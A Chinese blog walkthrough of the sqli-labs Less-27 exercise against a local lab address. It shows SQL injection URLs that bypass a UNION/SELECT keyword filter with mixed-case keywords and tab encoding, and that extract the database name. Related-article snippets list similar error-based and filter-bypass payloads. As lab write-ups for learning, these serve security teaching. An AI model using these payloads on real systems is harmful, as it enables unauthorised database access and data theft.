SQL注入分析-less-27

最新推荐文章于 2022-11-20 12:19:54 发布
最新推荐文章于 2022-11-20 12:19:54 发布
阅读量1.5k 收藏 2
点赞数 2
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33505576/article/details/113853272
版权

SQL注入分析-less-27

1、 概述:从本篇开始,后续都会写个概述,简单描述一下对题目的理解,本关的题目是 GET-Error Based-All your UNION&SELECT Belong to us-String-Single quote 中文名称,基于GET型的报错-构造属于你自己的UNION和SELECT-单引号字符型的注入,从名字上来看,这关需要通过报错信息来获取库名、表名、列名和对应字段(列)的数据,同时应该是对单引号敏感。

2、 尝试一下我们的猜想,按照提示,输入参数:

http://192.168.88.129/sqli-labs-master/Less-27/?id=1

结果如下:

在这里插入图片描述
这里正常进行了回显,继续,输入单引号试试:

http://192.168.88.129/sqli-labs-master/Less-27/?id=1’

结果如下:

在这里插入图片描述
这里报错,报错信息为 ‘1’’ LIMIT 0,1,典型的字符型注入,对单引号敏感。

3、接下来通过单引号进行闭合,先用order by来判定表的列数:

http://192.168.88.129/sqli-labs-master/Less-27/?id=1’order%09by%091,2,3,4,'5

结果如下:

在这里插入图片描述
由以上结果可得,表的列数为3列,继续用联合查询union来确定回显的位置:

http://192.168.88.129/sqli-labs-master/Less-27/?id=1’union%09select%091,2,3

结果如下:

在这里插入图片描述
从这里可以看到,union和select都被吃掉了,所以可知,这关对union和select进行了过滤,如何绕过成为了这关的一个考点,这里猜测是对union和select的关键词进行了过滤,我用大小写混合的方式来试着绕过看看:

http://192.168.88.129/sqli-labs-master/Less-27/?id=0’UnIon%09SeleCt%091,2,'3

结果如下:

在这里插入图片描述
成功回显,显示位也报出来了,在用户名和密码的位置,但密码的位置需要使用单引号进行闭合,无法利用,这里我只能用用户名字段来回显我需要的信息,其实到这,本关想要刁难你的东西基本就被破解了,接下来就是按照正常步骤,在用户名的位置逐步回显你想要的数据库、表名以及字段的信息了。

比如我要库名,就将2换成database()

http://192.168.88.129/sqli-labs-master/Less-27/?id=0’UnIon%09SeleCt%091,database(),'3

结果如下:

在这里插入图片描述
后面就不继续了,比较简单。

复古追月
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sql注入详细解释
JiangHu_Java的博客
10-21 404
sql注入以及应对措施sql注入是什么?sql注入的危害sql注入的几种方式 sql注入是什么? sql是我们操作数据库与其交互的语言,而sql注入是用户将Web页面的原URL、表单域或数据包输入的参数,修改拼接成sql语句,传递给Web服务器,进而传给数据库服务器。由于程序编写人员对于提交到数据库的请求没有进行验证和过滤导致拼接的sql语句被执行很有可能导致数据库的数据被获取,这就叫sql注入攻击。 上面说的 可能有一点复杂,其实sql注入简单来说就是将sql语句添加到输入的参数当中传递到数据库执行的一种
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
SQL注入分析-Less-27a
qq_33505576的博客
02-19 305
SQL注入分析-Less-27a 1、 概述:此关的名称GET-Blind Based-All your UNION & SELECT Belong to us-Double Quotes,中文名称是基于GET型的盲注—构造你自己的union和select—双引号注入,从题目名称来看,推测这关是盲注,无法通过报错信息来获取所需要的数据,只能通过盲注的方式,这里我想的是通过布尔盲注的方式来获取信息,同时要通过技巧绕过UNION和SELECT查询语句,而且拼接过程中需要使用双引号进行闭合。 2、根据猜想
sqli-labs/Less-27
m0_71299382的博客
11-20 378
sqli-labs第二十七关
Less-27and27a
老司机开代码的博客
08-04 248
文章目录1. 思路分析2. 注入过程3. 27a 1. 思路分析 这一关表上上告诉你他只是过滤了union和select,其实不然。 function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三关,SQLi-LABS Less-23,SQLi-LABS Less 23,SQLiLABS Less23,SQLi Less 23
SQL 注入天书.pdf
08-06
Less-1至Less-4逐步引导用户了解如何通过构造恶意输入来执行未授权的数据库查询,揭示了SQL注入的基本攻击手法。 **盲注讲解(Blind Injection)** Background-2介绍了盲注,这是一种更为隐蔽的注入方式,攻击者在...
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
第十一节 HTTP头中的SQL注入-01
09-15
【网络协议 SQL注入详解】 在网络安全领域,HTTP头中的SQL注入是一种常见的攻击手段,它利用了网站应用程序在处理HTTP请求头信息时的不安全性。随着安全意识的提高,许多开发者开始对用户输入的数据进行过滤,以...
sqli-labs实验指导手册
最新发布
11-17
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过在Web应用程序的输入字段中插入恶意SQL代码来操纵数据库。sqli-labs是一个专门设计的实验平台,用于教育和实践SQL注入技术。以下是对sqli-labs实验指导手册中涉及...
sql注入21-27
qq_45751902的博客
04-01 3074
21关 经过这两个可知,有加密,在网上找大佬的解法说,使用了base64加密 解密后 base64编解码地址: https://tool.oschina.net/encrypt?type=3 可以推出,我们需要在burp suite上将编码后的内容输入 ') and updatexml(1,concat(0x7e,database(),0x7e),1)# ') union select 1,2, updatexml(1,concat(0x7e,database(),0x7e),1)# 同时因为有回
Sqli-labs之Less-27和Less-27a
→_→
04-26 1891
Less-27 基于错误_GET_过滤UNION/SELECT_单引号_字符型注入 测试注入字符类型: ?id=2'%26%26 '1'='1 (id=2的用户说明不带括号,id=1的用户说明带括号) 由此得出,这是单引号字符型注入。(不带小括号的) 根据提示...
SQLi-LABS Less-27到Less-28a
m0_64898960的博客
04-29 171
Less-27题目 经过测试发现需要“ ’ ”进行闭合… 尝试猜字段,发现除了空格和注释符,一些内容好像又可以用了,如or… 不能使用union和select 我们可以通过间接大小写来达到或者像union里面再塞一个union来达到绕过的效果… 开始爆数据库 这里使用了-1发现“ - ”好像被过滤了,改为100 下面的注入照常,只要注意一下union和select的输入即可 Less-27a题目 测试出闭合条件“ " ” 经过尝试,没有报错的回显…可以用题目说的盲注也可以大小写union和sel
Sqli-labs less 27
weixin_34345753的博客
08-11 159
Less-27 本关主要考察将union,select和26关过滤掉的字符。此处我们依旧和26关的方式是一样的,只需要将union和select改为大小写混合就可以突破。 示例:127.0.0.1/sqllib/Less-27/?id=100'unIon%a0SelEcT%a01,database(),3||'1 TIPS:uniunionon也是可以突破限制的。亦可以利用报错注入和延时注入...
less学习笔记--27/8/17
yulin009的博客
08-27 223
less最新官网 http://less.bootcss.com/ Less 是一种动态的样式语言。Less扩展了CSS的动态行为,比如说,设置变量(Variables)、混合书写模式(mixins)、操作(operations)和功能(functions)等等,最棒的是,Less使用了现有的CSS语法,也就是说,你可以直接把你现成的样式文件“style.css”直接改成“style.le
sqli-labs:less-27(过滤select和union)
羽的博客
09-14 464
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-less27过滤注入
青空桑
05-22 273
sqli-less27过滤注入 一、检查网站 127.0.0.1/sqli/less-27/?id=1' 1、可以发现空格被过滤了 空格的部分替换方法:/%0a/、%0a、%09 2、–+也被过滤了 可以选择封装代码:简单来说就是代码结尾加上 ,’ 二、爆数据库名 编写思路:1、过滤部分(空格,–+,大小写)2、查询思路 ?id=0%27%0aUNIon%0aSElect%0a1,database(),%27 三、爆表名 id=0%27%0aUNIon%0aSElect%0a1,(SELEct%0a
SQL : 练习题-27
weixin_44523387的博客
07-15 146
查询课程名称为「数学」,且分数低于 60 的学生姓名和分数 select student.sname, sc.score from student, sc, course where student.sid = sc.sid and course.cid = sc.cid and course.cname = "数学" and sc.score < 60; ...
【sqli-labs】 less27 GET- Error based -All you Union&Select Belong to us -String -Single quote(GET型基于错...
ajxi63204的博客
01-28 135
看一下过滤函数 看一下/s是什么东西 那直接通过大小写就可以绕过了 http://192.168.136.128/sqli-labs-master/Less-27/?id=0'%a0uNion%a0sElect%a01,2,%273 转载于:https://www.cnblogs.com/omnis/p/8371847.html...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值